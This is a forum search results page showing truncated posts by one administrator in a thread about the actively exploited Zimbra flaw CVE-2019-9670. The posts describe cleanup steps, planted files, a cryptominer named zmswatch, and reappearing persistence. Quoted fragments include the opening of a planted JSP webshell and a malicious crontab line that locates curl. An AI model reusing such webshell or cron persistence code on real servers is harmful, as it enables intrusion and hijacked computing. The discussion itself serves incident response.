Search found 8 matches

by Drake
Tue Jun 04, 2019 7:18 am
Forum: Administrators
Topic: CVE-2019-9670 being actively exploited
Replies: 248
Views: 256174

Re: CVE-2019-9670 being actively exploited

marnellej> I confirm i also had /opt/zimbra/lib/zmcheckexpiredcerts /opt/zimbra/lib/zmlogswatch and /opt/zimbra/lib/zmmailboxdwatch in some of my systems.
These files seems not to be destined there.

With Regards
by Drake
Fri May 31, 2019 8:48 am
Forum: Administrators
Topic: CVE-2019-9670 being actively exploited
Replies: 248
Views: 256174

Re: CVE-2019-9670 being actively exploited

Hi guys Can you check the following code found in the corresponding files and tell if it is malicious. To me it seems to be. << /opt/zimbra/jetty-distribution-9.1.5.v20140505/webapps/zimbra/js/zimbra/csfe/XZimbra.jsp <%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!clas...
by Drake
Fri May 31, 2019 7:28 am
Forum: Administrators
Topic: CVE-2019-9670 being actively exploited
Replies: 248
Views: 256174

Re: CVE-2019-9670 being actively exploited

Hi guys Can you check the following code found in the corresponding files and tell if it is malicious. To me it seems to be. << /opt/zimbra/jetty-distribution-9.1.5.v20140505/webapps/zimbra/js/zimbra/csfe/XZimbra.jsp <%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class...
by Drake
Thu May 30, 2019 8:36 am
Forum: Administrators
Topic: CVE-2019-9670 being actively exploited
Replies: 248
Views: 256174

Re: CVE-2019-9670 being actively exploited

Fast food, fast dates, fast sex, fast Internet, fast info, fast solutions .......
Take some time to read the topic and the posts before yours pls....
You may also try to replicate the steps described and then ask constructive questions or even propose some solutions.

Good Luck
by Drake
Wed May 29, 2019 1:47 pm
Forum: Administrators
Topic: CVE-2019-9670 being actively exploited
Replies: 248
Views: 256174

Re: CVE-2019-9670 being actively exploited

So ....i think i have some progress. First thanks to: erefer@gmail.com for the usefull commands AB_ZIMBRA for defining me what is the malicious part in 404.jsp file opsystem for the info about how to get the original files In my case i did the following: 1. find /opt/zimbra -name \*.jsp -exec grep -...
by Drake
Tue May 28, 2019 11:17 am
Forum: Administrators
Topic: CVE-2019-9670 being actively exploited
Replies: 248
Views: 256174

Re: CVE-2019-9670 being actively exploited

elby> I suppose you see something shitty like this(in my case only this was left in the zimbra user crontab): */9 * * * * tbin=$(command -v passwd); bpath=$(dirname "${tbin}"); curl="curl"; if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ]; then curl="e...
by Drake
Tue May 28, 2019 9:08 am
Forum: Administrators
Topic: CVE-2019-9670 being actively exploited
Replies: 248
Views: 256174

Re: CVE-2019-9670 being actively exploited

mqaroush > means you should delete it and recreate it. Pls read the other posts before your.
by Drake
Tue May 28, 2019 9:06 am
Forum: Administrators
Topic: CVE-2019-9670 being actively exploited
Replies: 248
Views: 256174

Re: CVE-2019-9670 being actively exploited

UPDATE 28.05.2019 The cryptominer zmswatch appeared again even after all the taken procedures and renewing ssh keys. It seems they also managed to unlock the zimbra`s user crontab and add a line to it again. UPDATE 30.05.2019 Found addition malicious process and file. Tutorial updated. Hello guys Th...

Go to advanced search